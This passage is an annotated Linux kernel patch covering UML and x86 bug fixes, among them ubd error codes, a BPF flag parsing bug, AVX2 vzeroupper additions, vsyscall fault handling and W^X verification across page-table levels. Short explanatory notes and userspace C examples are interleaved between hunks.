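            int fd;
    };

    static struct handler *handlers;
    static pthread_mutex_t handlers_lock = PTHREAD_MUTEX_INITIALIZER;

    /* Stand-in for um_request_irq(); may invoke the handler at once. */
    static int request_event_source(int fd) { return fd >= 0 ? 0 : -1; }

    int register_handler(int fd)
    {
            struct handler *h = malloc(sizeof(*h)), **pp;

            if (!h)
                    return -1;
            h->fd = fd;

            /* 1. Publish first: a handler firing right away finds its entry. */
            pthread_mutex_lock(&handlers_lock);
            h->next = handlers;
            handlers = h;
            pthread_mutex_unlock(&handlers_lock);

            /* 2. Enable the source; roll the publication back on failure. */
            if (request_event_source(fd) < 0) {
                    pthread_mutex_lock(&handlers_lock);
                    for (pp = &handlers; *pp; pp = &(*pp)->next)
                            if (*pp == h) {
                                    *pp = h->next;
                                    break;
                            }
                    pthread_mutex_unlock(&handlers_lock);
                    free(h);
                    return -1;
            }
            return 0;
    }

    int main(void) { return register_handler(3); }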
+diff --git a/arch/um/drivers/ubd_kern.c b/arch/um/drivers/ubd_kern.c
+index f4c1e6e97ad52..13a22a4613051 100644
+--- a/arch/um/drivers/ubd_kern.c
++++ b/arch/um/drivers/ubd_kern.c
+@@ -1099,7 +1099,7 @@ static int __init ubd_init(void)
+ 
+ 	if (irq_req_buffer == NULL) {
+ 		printk(KERN_ERR "Failed to initialize ubd buffering\n");
+-		return -1;
++		return -ENOMEM;
+ 	}
+ 	io_req_buffer = kmalloc_array(UBD_REQ_BUFFER_SIZE,
+ 				      sizeof(struct io_thread_req *),
+@@ -1110,7 +1110,7 @@ static int __init ubd_init(void)
+ 
+ 	if (io_req_buffer == NULL) {
+ 		printk(KERN_ERR "Failed to initialize ubd buffering\n");
+-		return -1;
++		return -ENOMEM;
+ 	}
+ 	platform_driver_register(&ubd_driver);
+ 	mutex_lock(&ubd_lock);
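The -ENOMEM change above matters because initcall return values are interpreted as negative errno codes; a bare -1 happens to equal -EPERM and misreports the failure. The shape of the convention, in a compilable userspace approximation:

    #include <errno.h>
    #include <stdlib.h>

    /* Kernel-style init function: 0 on success, negative errno on failure. */
    static int example_init(void)
    {
            void *buf = malloc(4096);       /* stands in for kmalloc_array() */

            if (!buf)
                    return -ENOMEM;         /* not -1, which reads as -EPERM */

            free(buf);
            return 0;
    }

    int main(void) { return example_init() ? 1 : 0; }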
+diff --git a/arch/um/drivers/vector_kern.c b/arch/um/drivers/vector_kern.c
+index 131b7cb295767..94a4dfac6c236 100644
+--- a/arch/um/drivers/vector_kern.c
++++ b/arch/um/drivers/vector_kern.c
+@@ -141,7 +141,7 @@ static bool get_bpf_flash(struct arglist *def)
+ 
+ 	if (allow != NULL) {
+ 		if (kstrtoul(allow, 10, &result) == 0)
+-			return (allow > 0);
++			return result > 0;
+ 	}
+ 	return false;
+ }
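The get_bpf_flash() fix above is the classic parse-then-test-the-wrong-variable bug: the code tested the input pointer (allow) rather than the parsed value (result). The same pitfall reproduced with strtoul in userspace:

    #include <stdio.h>
    #include <stdlib.h>

    int main(void)
    {
            const char *allow = "0";
            char *end;
            unsigned long result = strtoul(allow, &end, 10);

            if (end != allow) {
                    /* BUG: '(allow > 0)' compares a pointer, always true. */
                    /* FIX: test the parsed value instead: */
                    printf("flag enabled: %s\n", result > 0 ? "yes" : "no");
            }
            return 0;
    }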
+diff --git a/arch/um/include/asm/kasan.h b/arch/um/include/asm/kasan.h
+index 0d6547f4ec85c..f97bb1f7b8514 100644
+--- a/arch/um/include/asm/kasan.h
++++ b/arch/um/include/asm/kasan.h
+@@ -24,7 +24,6 @@
+ 
+ #ifdef CONFIG_KASAN
+ void kasan_init(void);
+-void kasan_map_memory(void *start, unsigned long len);
+ extern int kasan_um_is_ready;
+ 
+ #ifdef CONFIG_STATIC_LINK
+diff --git a/arch/um/include/asm/mmu.h b/arch/um/include/asm/mmu.h
+index 5b072aba5b658..a7cb380c0b5c0 100644
+--- a/arch/um/include/asm/mmu.h
++++ b/arch/um/include/asm/mmu.h
+@@ -15,8 +15,6 @@ typedef struct mm_context {
+ 	struct page *stub_pages[2];
+ } mm_context_t;
+ 
+-extern void __switch_mm(struct mm_id * mm_idp);
+-
+ /* Avoid tangled inclusion with asm/ldt.h */
+ extern long init_new_ldt(struct mm_context *to_mm, struct mm_context *from_mm);
+ extern void free_ldt(struct mm_context *mm);
+diff --git a/arch/um/include/asm/processor-generic.h b/arch/um/include/asm/processor-generic.h
+index bb5f06480da95..9adfcef579c1c 100644
+--- a/arch/um/include/asm/processor-generic.h
++++ b/arch/um/include/asm/processor-generic.h
+@@ -95,7 +95,6 @@ extern struct cpuinfo_um boot_cpu_data;
+ #define current_cpu_data boot_cpu_data
+ #define cache_line_size()	(boot_cpu_data.cache_alignment)
+ 
+-extern unsigned long get_thread_reg(int reg, jmp_buf *buf);
+ #define KSTK_REG(tsk, reg) get_thread_reg(reg, &tsk->thread.switch_buf)
+ extern unsigned long __get_wchan(struct task_struct *p);
+ 
+diff --git a/arch/um/include/shared/kern_util.h b/arch/um/include/shared/kern_util.h
+index 444bae755b16a..7372746c16875 100644
+--- a/arch/um/include/shared/kern_util.h
++++ b/arch/um/include/shared/kern_util.h
+@@ -67,4 +67,6 @@ extern void fatal_sigsegv(void) __attribute__ ((noreturn));
+ 
+ void um_idle_sleep(void);
+ 
++void kasan_map_memory(void *start, size_t len);
++
+ #endif
+diff --git a/arch/um/include/shared/skas/mm_id.h b/arch/um/include/shared/skas/mm_id.h
+index e82e203f5f419..92dbf727e3842 100644
+--- a/arch/um/include/shared/skas/mm_id.h
++++ b/arch/um/include/shared/skas/mm_id.h
+@@ -15,4 +15,6 @@ struct mm_id {
+ 	int kill;
+ };
+ 
++void __switch_mm(struct mm_id *mm_idp);
++
+ #endif
+diff --git a/arch/um/os-Linux/mem.c b/arch/um/os-Linux/mem.c
+index 8530b2e086049..c6c9495b14321 100644
+--- a/arch/um/os-Linux/mem.c
++++ b/arch/um/os-Linux/mem.c
+@@ -15,6 +15,7 @@
+ #include <sys/vfs.h>
+ #include <linux/magic.h>
+ #include <init.h>
++#include <kern_util.h>
+ #include <os.h>
+ 
+ /*
+diff --git a/arch/x86/Kconfig.debug b/arch/x86/Kconfig.debug
+index bdfe08f1a9304..584fb1eea2cbf 100644
+--- a/arch/x86/Kconfig.debug
++++ b/arch/x86/Kconfig.debug
+@@ -248,6 +248,7 @@ config UNWINDER_ORC
+ 
+ config UNWINDER_FRAME_POINTER
+ 	bool "Frame pointer unwinder"
++	select ARCH_WANT_FRAME_POINTERS
+ 	select FRAME_POINTER
+ 	help
+ 	  This option enables the frame pointer unwinder for unwinding kernel
+@@ -271,7 +272,3 @@ config UNWINDER_GUESS
+ 	  overhead.
+ 
+ endchoice
+-
+-config FRAME_POINTER
+-	depends on !UNWINDER_ORC && !UNWINDER_GUESS
+-	bool
+diff --git a/arch/x86/boot/compressed/head_64.S b/arch/x86/boot/compressed/head_64.S
+index 0d7aef10b19ad..6bc70385314cb 100644
+--- a/arch/x86/boot/compressed/head_64.S
++++ b/arch/x86/boot/compressed/head_64.S
+@@ -390,6 +390,11 @@ SYM_CODE_START(startup_64)
+ 	call	sev_enable
+ #endif
+ 
++	/* Preserve only the CR4 bits that must be preserved, and clear the rest */
++	movq	%cr4, %rax
++	andl	$(X86_CR4_PAE | X86_CR4_MCE | X86_CR4_LA57), %eax
++	movq	%rax, %cr4
++
+ 	/*
+ 	 * configure_5level_paging() updates the number of paging levels using
+ 	 * a trampoline in 32-bit addressable memory if the current number does
+diff --git a/arch/x86/crypto/nh-avx2-x86_64.S b/arch/x86/crypto/nh-avx2-x86_64.S
+index 6a0b15e7196a8..54c0ee41209d5 100644
+--- a/arch/x86/crypto/nh-avx2-x86_64.S
++++ b/arch/x86/crypto/nh-avx2-x86_64.S
+@@ -153,5 +153,6 @@ SYM_FUNC_START(nh_avx2)
+ 	vpaddq		T1, T0, T0
+ 	vpaddq		T4, T0, T0
+ 	vmovdqu		T0, (HASH)
++	vzeroupper
+ 	RET
+ SYM_FUNC_END(nh_avx2)
+diff --git a/arch/x86/crypto/sha256-avx2-asm.S b/arch/x86/crypto/sha256-avx2-asm.S
+index 2d2be531a11ed..eaa093f973cc3 100644
+--- a/arch/x86/crypto/sha256-avx2-asm.S
++++ b/arch/x86/crypto/sha256-avx2-asm.S
+@@ -711,6 +711,7 @@ done_hash:
+ 	popq	%r13
+ 	popq	%r12
+ 	popq	%rbx
++	vzeroupper
+ 	RET
+ SYM_FUNC_END(sha256_transform_rorx)
+ 
+diff --git a/arch/x86/crypto/sha512-avx2-asm.S b/arch/x86/crypto/sha512-avx2-asm.S
+index b1ca99055ef99..17d6c756b5414 100644
+--- a/arch/x86/crypto/sha512-avx2-asm.S
++++ b/arch/x86/crypto/sha512-avx2-asm.S
+@@ -680,6 +680,7 @@ done_hash:
+ 	pop	%r12
+ 	pop	%rbx
+ 
++	vzeroupper
+ 	RET
+ SYM_FUNC_END(sha512_transform_rorx)
+ 
+diff --git a/arch/x86/entry/vsyscall/vsyscall_64.c b/arch/x86/entry/vsyscall/vsyscall_64.c
+index 4af81df133ee8..5d4ca8b942939 100644
+--- a/arch/x86/entry/vsyscall/vsyscall_64.c
++++ b/arch/x86/entry/vsyscall/vsyscall_64.c
+@@ -98,11 +98,6 @@ static int addr_to_vsyscall_nr(unsigned long addr)
+ 
+ static bool write_ok_or_segv(unsigned long ptr, size_t size)
+ {
+-	/*
+-	 * XXX: if access_ok, get_user, and put_user handled
+-	 * sig_on_uaccess_err, this could go away.
+-	 */
+-
+ 	if (!access_ok((void __user *)ptr, size)) {
+ 		struct thread_struct *thread = &current->thread;
+ 
+@@ -120,10 +115,8 @@ static bool write_ok_or_segv(unsigned long ptr, size_t size)
+ bool emulate_vsyscall(unsigned long error_code,
+ 		      struct pt_regs *regs, unsigned long address)
+ {
+-	struct task_struct *tsk;
+ 	unsigned long caller;
+ 	int vsyscall_nr, syscall_nr, tmp;
+-	int prev_sig_on_uaccess_err;
+ 	long ret;
+ 	unsigned long orig_dx;
+ 
+@@ -172,8 +165,6 @@ bool emulate_vsyscall(unsigned long error_code,
+ 		goto sigsegv;
+ 	}
+ 
+-	tsk = current;
+-
+ 	/*
+ 	 * Check for access_ok violations and find the syscall nr.
+ 	 *
+@@ -234,12 +225,8 @@ bool emulate_vsyscall(unsigned long error_code,
+ 		goto do_ret;  /* skip requested */
+ 
+ 	/*
+-	 * With a real vsyscall, page faults cause SIGSEGV.  We want to
+-	 * preserve that behavior to make writing exploits harder.
++	 * With a real vsyscall, page faults cause SIGSEGV.
+ 	 */
+-	prev_sig_on_uaccess_err = current->thread.sig_on_uaccess_err;
+-	current->thread.sig_on_uaccess_err = 1;
+-
+ 	ret = -EFAULT;
+ 	switch (vsyscall_nr) {
+ 	case 0:
+@@ -262,23 +249,12 @@ bool emulate_vsyscall(unsigned long error_code,
+ 		break;
+ 	}
+ 
+-	current->thread.sig_on_uaccess_err = prev_sig_on_uaccess_err;
+-
+ check_fault:
+ 	if (ret == -EFAULT) {
+ 		/* Bad news -- userspace fed a bad pointer to a vsyscall. */
+ 		warn_bad_vsyscall(KERN_INFO, regs,
+ 				  "vsyscall fault (exploit attempt?)");
+-
+-		/*
+-		 * If we failed to generate a signal for any reason,
+-		 * generate one here.  (This should be impossible.)
+-		 */
+-		if (WARN_ON_ONCE(!sigismember(&tsk->pending.signal, SIGBUS) &&
+-				 !sigismember(&tsk->pending.signal, SIGSEGV)))
+-			goto sigsegv;
+-
+-		return true;  /* Don't emulate the ret. */
++		goto sigsegv;
+ 	}
+ 
+ 	regs->ax = ret;
+diff --git a/arch/x86/include/asm/pgtable_types.h b/arch/x86/include/asm/pgtable_types.h
+index f0b9b37c4609b..e3028373f0b45 100644
+--- a/arch/x86/include/asm/pgtable_types.h
++++ b/arch/x86/include/asm/pgtable_types.h
+@@ -544,6 +544,8 @@ static inline void update_page_count(int level, unsigned long pages) { }
+ extern pte_t *lookup_address(unsigned long address, unsigned int *level);
+ extern pte_t *lookup_address_in_pgd(pgd_t *pgd, unsigned long address,
+ 				    unsigned int *level);
++pte_t *lookup_address_in_pgd_attr(pgd_t *pgd, unsigned long address,
++				  unsigned int *level, bool *nx, bool *rw);
+ extern pmd_t *lookup_pmd_address(unsigned long address);
+ extern phys_addr_t slow_virt_to_phys(void *__address);
+ extern int __init kernel_map_pages_in_pgd(pgd_t *pgd, u64 pfn,
+diff --git a/arch/x86/include/asm/processor.h b/arch/x86/include/asm/processor.h
+index 94ea13adb724a..3ed6cc7785037 100644
+--- a/arch/x86/include/asm/processor.h
++++ b/arch/x86/include/asm/processor.h
+@@ -519,7 +519,6 @@ struct thread_struct {
+ 	unsigned long		iopl_emul;
+ 
+ 	unsigned int		iopl_warn:1;
+-	unsigned int		sig_on_uaccess_err:1;
+ 
+ 	/*
+ 	 * Protection Keys Register for Userspace.  Loaded immediately on
+diff --git a/arch/x86/include/asm/sparsemem.h b/arch/x86/include/asm/sparsemem.h
+index 1be13b2dfe8bf..64df897c0ee30 100644
+--- a/arch/x86/include/asm/sparsemem.h
++++ b/arch/x86/include/asm/sparsemem.h
+@@ -37,8 +37,6 @@ extern int phys_to_target_node(phys_addr_t start);
+ #define phys_to_target_node phys_to_target_node
+ extern int memory_add_physaddr_to_nid(u64 start);
+ #define memory_add_physaddr_to_nid memory_add_physaddr_to_nid
+-extern int numa_fill_memblks(u64 start, u64 end);
+-#define numa_fill_memblks numa_fill_memblks
+ #endif
+ #endif /* __ASSEMBLY__ */
+ 
+diff --git a/arch/x86/kernel/apic/vector.c b/arch/x86/kernel/apic/vector.c
+index 3e6f6b448f6aa..d261b4c207d05 100644
+--- a/arch/x86/kernel/apic/vector.c
++++ b/arch/x86/kernel/apic/vector.c
+@@ -982,7 +982,8 @@ static void __send_cleanup_vector(struct apic_chip_data *apicd)
+ 		hlist_add_head(&apicd->clist, per_cpu_ptr(&cleanup_list, cpu));
+ 		apic->send_IPI(cpu, IRQ_MOVE_CLEANUP_VECTOR);
+ 	} else {
+-		apicd->prev_vector = 0;
++		pr_warn("IRQ %u schedule cleanup for offline CPU %u\n", apicd->irq, cpu);
++		free_moved_vector(apicd);
+ 	}
+ 	raw_spin_unlock(&vector_lock);
+ }
+@@ -1019,6 +1020,7 @@ void irq_complete_move(struct irq_cfg *cfg)
+  */
+ void irq_force_complete_move(struct irq_desc *desc)
+ {
++	unsigned int cpu = smp_processor_id();
+ 	struct apic_chip_data *apicd;
+ 	struct irq_data *irqd;
+ 	unsigned int vector;
+@@ -1043,10 +1045,11 @@ void irq_force_complete_move(struct irq_desc *desc)
+ 		goto unlock;
+ 
+ 	/*
+-	 * If prev_vector is empty, no action required.
++	 * If prev_vector is empty or the descriptor is neither currently
++	 * nor previously on the outgoing CPU, no action is required.
+ 	 */
+ 	vector = apicd->prev_vector;
+-	if (!vector)
++	if (!vector || (apicd->cpu != cpu && apicd->prev_cpu != cpu))
+ 		goto unlock;
+ 
+ 	/*
+diff --git a/arch/x86/kernel/tsc_sync.c b/arch/x86/kernel/tsc_sync.c
+index 9452dc9664b51..7a1e3f53be24b 100644
+--- a/arch/x86/kernel/tsc_sync.c
++++ b/arch/x86/kernel/tsc_sync.c
+@@ -192,11 +192,9 @@ bool tsc_store_and_check_tsc_adjust(bool bootcpu)
+ 	cur->warned = false;
+ 
+ 	/*
+-	 * If a non-zero TSC value for socket 0 may be valid then the default
+-	 * adjusted value cannot assumed to be zero either.
++	 * The default adjust value cannot be assumed to be zero on any socket.
+ 	 */
+-	if (tsc_async_resets)
+-		cur->adjusted = bootval;
++	cur->adjusted = bootval;
+ 
+ 	/*
+ 	 * Check whether this CPU is the first in a package to come up. In
+diff --git a/arch/x86/kvm/cpuid.c b/arch/x86/kvm/cpuid.c
+index f02961cbbb75a..3818c85cf964e 100644
+--- a/arch/x86/kvm/cpuid.c
++++ b/arch/x86/kvm/cpuid.c
+@@ -1157,9 +1157,8 @@ static inline int __do_cpuid_func(struct kvm_cpuid_array *array, u32 function)
+ 		entry->eax = entry->ebx = entry->ecx = 0;
+ 		break;
+ 	case 0x80000008: {
+-		unsigned g_phys_as = (entry->eax >> 16) & 0xff;
+-		unsigned virt_as = max((entry->eax >> 8) & 0xff, 48U);
+-		unsigned phys_as = entry->eax & 0xff;
++		unsigned int virt_as = max((entry->eax >> 8) & 0xff, 48U);
++		unsigned int phys_as;
+ 
+ 		/*
+ 		 * If TDP (NPT) is disabled use the adjusted host MAXPHYADDR as
+@@ -1167,16 +1166,16 @@ static inline int __do_cpuid_func(struct kvm_cpuid_array *array, u32 function)
+ 		 * reductions in MAXPHYADDR for memory encryption affect shadow
+ 		 * paging, too.
+ 		 *
+-		 * If TDP is enabled but an explicit guest MAXPHYADDR is not
+-		 * provided, use the raw bare metal MAXPHYADDR as reductions to
+-		 * the HPAs do not affect GPAs.
++		 * If TDP is enabled, use the raw bare metal MAXPHYADDR as
++		 * reductions to the HPAs do not affect GPAs.
+ 		 */
+-		if (!tdp_enabled)
+-			g_phys_as = boot_cpu_data.x86_phys_bits;
+-		else if (!g_phys_as)
+-			g_phys_as = phys_as;
++		if (!tdp_enabled) {
++			phys_as = boot_cpu_data.x86_phys_bits;
++		} else {
++			phys_as = entry->eax & 0xff;
++		}
+ 
+-		entry->eax = g_phys_as | (virt_as << 8);
++		entry->eax = phys_as | (virt_as << 8);
+ 		entry->ecx &= ~(GENMASK(31, 16) | GENMASK(11, 8));
+ 		entry->edx = 0;
+ 		cpuid_entry_override(entry, CPUID_8000_0008_EBX);
+diff --git a/arch/x86/lib/x86-opcode-map.txt b/arch/x86/lib/x86-opcode-map.txt
+index d12d1358f96d2..8eaf140172c58 100644
+--- a/arch/x86/lib/x86-opcode-map.txt
++++ b/arch/x86/lib/x86-opcode-map.txt
+@@ -148,7 +148,7 @@ AVXcode:
+ 65: SEG=GS (Prefix)
+ 66: Operand-Size (Prefix)
+ 67: Address-Size (Prefix)
+-68: PUSH Iz (d64)
++68: PUSH Iz
+ 69: IMUL Gv,Ev,Iz
+ 6a: PUSH Ib (d64)
+ 6b: IMUL Gv,Ev,Ib
+@@ -698,10 +698,10 @@ AVXcode: 2
+ 4d: vrcp14ss/d Vsd,Hpd,Wsd (66),(ev)
+ 4e: vrsqrt14ps/d Vpd,Wpd (66),(ev)
+ 4f: vrsqrt14ss/d Vsd,Hsd,Wsd (66),(ev)
+-50: vpdpbusd Vx,Hx,Wx (66),(ev)
+-51: vpdpbusds Vx,Hx,Wx (66),(ev)
+-52: vdpbf16ps Vx,Hx,Wx (F3),(ev) | vpdpwssd Vx,Hx,Wx (66),(ev) | vp4dpwssd Vdqq,Hdqq,Wdq (F2),(ev)
+-53: vpdpwssds Vx,Hx,Wx (66),(ev) | vp4dpwssds Vdqq,Hdqq,Wdq (F2),(ev)
++50: vpdpbusd Vx,Hx,Wx (66)
++51: vpdpbusds Vx,Hx,Wx (66)
++52: vdpbf16ps Vx,Hx,Wx (F3),(ev) | vpdpwssd Vx,Hx,Wx (66) | vp4dpwssd Vdqq,Hdqq,Wdq (F2),(ev)
++53: vpdpwssds Vx,Hx,Wx (66) | vp4dpwssds Vdqq,Hdqq,Wdq (F2),(ev)
+ 54: vpopcntb/w Vx,Wx (66),(ev)
+ 55: vpopcntd/q Vx,Wx (66),(ev)
+ 58: vpbroadcastd Vx,Wx (66),(v)
+diff --git a/arch/x86/mm/fault.c b/arch/x86/mm/fault.c
+index f20636510eb1e..2fc007752ceb1 100644
+--- a/arch/x86/mm/fault.c
++++ b/arch/x86/mm/fault.c
+@@ -737,39 +737,8 @@ kernelmode_fixup_or_oops(struct pt_regs *regs, unsigned long error_code,
+ 	WARN_ON_ONCE(user_mode(regs));
+ 
+ 	/* Are we prepared to handle this kernel fault? */
+-	if (fixup_exception(regs, X86_TRAP_PF, error_code, address)) {
+-		/*
+-		 * Any interrupt that takes a fault gets the fixup. This makes
+-		 * the below recursive fault logic only apply to a faults from
+-		 * task context.
+-		 */
+-		if (in_interrupt())
+-			return;
+-
+-		/*
+-		 * Per the above we're !in_interrupt(), aka. task context.
+-		 *
+-		 * In this case we need to make sure we're not recursively
+-		 * faulting through the emulate_vsyscall() logic.
+-		 */
+-		if (current->thread.sig_on_uaccess_err && signal) {
+-			sanitize_error_code(address, &error_code);
+-
+-			set_signal_archinfo(address, error_code);
+-
+-			if (si_code == SEGV_PKUERR) {
+-				force_sig_pkuerr((void __user *)address, pkey);
+-			} else {
+-				/* XXX: hwpoison faults will set the wrong code. */
+-				force_sig_fault(signal, si_code, (void __user *)address);
+-			}
+-		}
+-
+-		/*
+-		 * Barring that, we can do the fixup and be happy.
+-		 */
++	if (fixup_exception(regs, X86_TRAP_PF, error_code, address))
+ 		return;
+-	}
+ 
+ 	/*
+ 	 * AMD erratum #91 manifests as a spurious page fault on a PREFETCH
+diff --git a/arch/x86/mm/numa.c b/arch/x86/mm/numa.c
+index dae5c952735c7..c7fa5396c0f05 100644
+--- a/arch/x86/mm/numa.c
++++ b/arch/x86/mm/numa.c
+@@ -956,6 +956,8 @@ int memory_add_physaddr_to_nid(u64 start)
+ }
+ EXPORT_SYMBOL_GPL(memory_add_physaddr_to_nid);
+ 
++#endif
++
+ static int __init cmp_memblk(const void *a, const void *b)
+ {
+ 	const struct numa_memblk *ma = *(const struct numa_memblk **)a;
+@@ -1028,5 +1030,3 @@ int __init numa_fill_memblks(u64 start, u64 end)
+ 	}
+ 	return 0;
+ }
+-
+-#endif
+diff --git a/arch/x86/mm/pat/set_memory.c b/arch/x86/mm/pat/set_memory.c
+index 68d4f328f1696..fd412dec01259 100644
+--- a/arch/x86/mm/pat/set_memory.c
++++ b/arch/x86/mm/pat/set_memory.c
+@@ -583,7 +583,8 @@ static inline pgprot_t static_protections(pgprot_t prot, unsigned long start,
+  * Validate strict W^X semantics.
+  */
+ static inline pgprot_t verify_rwx(pgprot_t old, pgprot_t new, unsigned long start,
+-				  unsigned long pfn, unsigned long npg)
++				  unsigned long pfn, unsigned long npg,
++				  bool nx, bool rw)
+ {
+ 	unsigned long end;
+ 
+@@ -609,6 +610,10 @@ static inline pgprot_t verify_rwx(pgprot_t old, pgprot_t new, unsigned long star
+ 	if ((pgprot_val(new) & (_PAGE_RW | _PAGE_NX)) != _PAGE_RW)
+ 		return new;
+ 
++	/* Non-leaf translation entries can disable writing or execution. */
++	if (!rw || nx)
++		return new;
++
+ 	end = start + npg * PAGE_SIZE - 1;
+ 	WARN_ONCE(1, "CPA detected W^X violation: %016llx -> %016llx range: 0x%016lx - 0x%016lx PFN %lx\n",
+ 		  (unsigned long long)pgprot_val(old),
+@@ -625,20 +630,26 @@ static inline pgprot_t verify_rwx(pgprot_t old, pgprot_t new, unsigned long star
+ 
+ /*
+  * Lookup the page table entry for a virtual address in a specific pgd.
+- * Return a pointer to the entry and the level of the mapping.
++ * Return a pointer to the entry, the level of the mapping, and the effective
++ * NX and RW bits of all page table levels.
+  */
+-pte_t *lookup_address_in_pgd(pgd_t *pgd, unsigned long address,
+-			     unsigned int *level)
++pte_t *lookup_address_in_pgd_attr(pgd_t *pgd, unsigned long address,
++				  unsigned int *level, bool *nx, bool *rw)
+ {
+ 	p4d_t *p4d;
+ 	pud_t *pud;
+ 	pmd_t *pmd;
+ 
+ 	*level = PG_LEVEL_NONE;
++	*nx = false;
++	*rw = true;
+ 
+ 	if (pgd_none(*pgd))
+ 		return NULL;
+ 
++	*nx |= pgd_flags(*pgd) & _PAGE_NX;
++	*rw &= pgd_flags(*pgd) & _PAGE_RW;
++
+ 	p4d = p4d_offset(pgd, address);
+ 	if (p4d_none(*p4d))
+ 		return NULL;
+@@ -647,6 +658,9 @@ pte_t *lookup_address_in_pgd(pgd_t *pgd, unsigned long address,
+ 	if (p4d_large(*p4d) || !p4d_present(*p4d))
+ 		return (pte_t *)p4d;
+ 
++	*nx |= p4d_flags(*p4d) & _PAGE_NX;
++	*rw &= p4d_flags(*p4d) & _PAGE_RW;
++
+ 	pud = pud_offset(p4d, address);
+ 	if (pud_none(*pud))
+ 		return NULL;
+@@ -655,6 +669,9 @@ pte_t *lookup_address_in_pgd(pgd_t *pgd, unsigned long address,
+ 	if (pud_large(*pud) || !pud_present(*pud))
+ 		return (pte_t *)pud;
+ 
++	*nx |= pud_flags(*pud) & _PAGE_NX;
++	*rw &= pud_flags(*pud) & _PAGE_RW;
++
+ 	pmd = pmd_offset(pud, address);
+ 	if (pmd_none(*pmd))
+ 		return NULL;
+@@ -663,11 +680,26 @@ pte_t *lookup_address_in_pgd(pgd_t *pgd, unsigned long address,
+ 	if (pmd_large(*pmd) || !pmd_present(*pmd))
+ 		return (pte_t *)pmd;
+ 
++	*nx |= pmd_flags(*pmd) & _PAGE_NX;
++	*rw &= pmd_flags(*pmd) & _PAGE_RW;
++
+ 	*level = PG_LEVEL_4K;
+ 
+ 	return pte_offset_kernel(pmd, address);
+ }
+ 
++/*
++ * Lookup the page table entry for a virtual address in a specific pgd.
++ * Return a pointer to the entry and the level of the mapping.
++ */
++pte_t *lookup_address_in_pgd(pgd_t *pgd, unsigned long address,
++			     unsigned int *level)
++{
++	bool nx, rw;
++
++	return lookup_address_in_pgd_attr(pgd, address, level, &nx, &rw);
++}
++
+ /*
+  * Lookup the page table entry for a virtual address. Return a pointer
+  * to the entry and the level of the mapping.
+@@ -683,13 +715,16 @@ pte_t *lookup_address(unsigned long address, unsigned int *level)
+ EXPORT_SYMBOL_GPL(lookup_address);
+ 
+ static pte_t *_lookup_address_cpa(struct cpa_data *cpa, unsigned long address,
+-				  unsigned int *level)
++				  unsigned int *level, bool *nx, bool *rw)
+ {
+-	if (cpa->pgd)
+-		return lookup_address_in_pgd(cpa->pgd + pgd_index(address),
+-					       address, level);
++	pgd_t *pgd;
++
++	if (!cpa->pgd)
++		pgd = pgd_offset_k(address);
++	else
++		pgd = cpa->pgd + pgd_index(address);
+ 
+-	return lookup_address(address, level);
++	return lookup_address_in_pgd_attr(pgd, address, level, nx, rw);
+ }
+ 
+ /*
+@@ -813,12 +848,13 @@ static int __should_split_large_page(pte_t *kpte, unsigned long address,
+ 	pgprot_t old_prot, new_prot, req_prot, chk_prot;
+ 	pte_t new_pte, *tmp;
+ 	enum pg_level level;
++	bool nx, rw;
+ 
+ 	/*
+ 	 * Check for races, another CPU might have split this page
+ 	 * up already:
+ 	 */
+-	tmp = _lookup_address_cpa(cpa, address, &level);
++	tmp = _lookup_address_cpa(cpa, address, &level, &nx, &rw);
+ 	if (tmp != kpte)
+ 		return 1;
+ 
+@@ -929,7 +965,8 @@ static int __should_split_large_page(pte_t *kpte, unsigned long address,
+ 	new_prot = static_protections(req_prot, lpaddr, old_pfn, numpages,
+ 				      psize, CPA_DETECT);
+ 
+-	new_prot = verify_rwx(old_prot, new_prot, lpaddr, old_pfn, numpages);
++	new_prot = verify_rwx(old_prot, new_prot, lpaddr, old_pfn, numpages,
++			      nx, rw);
+ 
+ 	/*
+ 	 * If there is a conflict, split the large page.
+@@ -1010,6 +1047,7 @@ __split_large_page(struct cpa_data *cpa, pte_t *kpte, unsigned long address,
+ 	pte_t *pbase = (pte_t *)page_address(base);
+ 	unsigned int i, level;
+ 	pgprot_t ref_prot;
++	bool nx, rw;
+ 	pte_t *tmp;
+ 
+ 	spin_lock(&pgd_lock);
+@@ -1017,7 +1055,7 @@ __split_large_page(struct cpa_data *cpa, pte_t *kpte, unsigned long address,
+ 	 * Check for races, another CPU might have split this page
+ 	 * up for us already:
+ 	 */
+-	tmp = _lookup_address_cpa(cpa, address, &level);
++	tmp = _lookup_address_cpa(cpa, address, &level, &nx, &rw);
+ 	if (tmp != kpte) {
+ 		spin_unlock(&pgd_lock);
+ 		return 1;
+@@ -1558,10 +1596,11 @@ static int __change_page_attr(struct cpa_data *cpa, int primary)
+ 	int do_split, err;
+ 	unsigned int level;
+ 	pte_t *kpte, old_pte;
++	bool nx, rw;
+ 
+ 	address = __cpa_addr(cpa, cpa->curpage);
+ repeat:
+-	kpte = _lookup_address_cpa(cpa, address, &level);
++	kpte = _lookup_address_cpa(cpa, address, &level, &nx, &rw);
+ 	if (!kpte)
+ 		return __cpa_process_fault(cpa, address, primary);
+ 
+@@ -1583,7 +1622,8 @@ static int __change_page_attr(struct cpa_data *cpa, int primary)
+ 		new_prot = static_protections(new_prot, address, pfn, 1, 0,
+ 					      CPA_PROTECT);
+ 
+-		new_prot = verify_rwx(old_prot, new_prot, address, pfn, 1);
++		new_prot = verify_rwx(old_prot, new_prot, address, pfn, 1,
++				      nx, rw);
+ 
+ 		new_prot = pgprot_clear_protnone_bits(new_prot);
+ 
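The verify_rwx() rework above is worth spelling out: a leaf PTE can look like RW plus exec while an upper-level entry has already cleared _PAGE_RW or set _PAGE_NX, so only the effective permissions across the whole walk can justify a W^X warning. That is why the new lookup_address_in_pgd_attr() ORs the NX bits and ANDs the RW bits level by level. A minimal stand-alone sketch of that accumulation (names and types here are illustrative, not the kernel's):

  /* Effective permissions over a multi-level walk: any level can
   * forbid execution (OR), every level must allow writing (AND). */
  struct level_flags {
          unsigned int nx : 1;
          unsigned int rw : 1;
  };

  static void effective_perms(const struct level_flags *lvl, int depth,
                              unsigned int *nx, unsigned int *rw)
  {
          int i;

          *nx = 0;
          *rw = 1;
          for (i = 0; i < depth; i++) {
                  *nx |= lvl[i].nx;
                  *rw &= lvl[i].rw;
          }
  }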
+diff --git a/arch/x86/purgatory/Makefile b/arch/x86/purgatory/Makefile
+index d28e0987aa85b..ebb1b786591d5 100644
+--- a/arch/x86/purgatory/Makefile
++++ b/arch/x86/purgatory/Makefile
+@@ -42,7 +42,8 @@ KCOV_INSTRUMENT := n
+ # make up the standalone purgatory.ro
+ 
+ PURGATORY_CFLAGS_REMOVE := -mcmodel=kernel
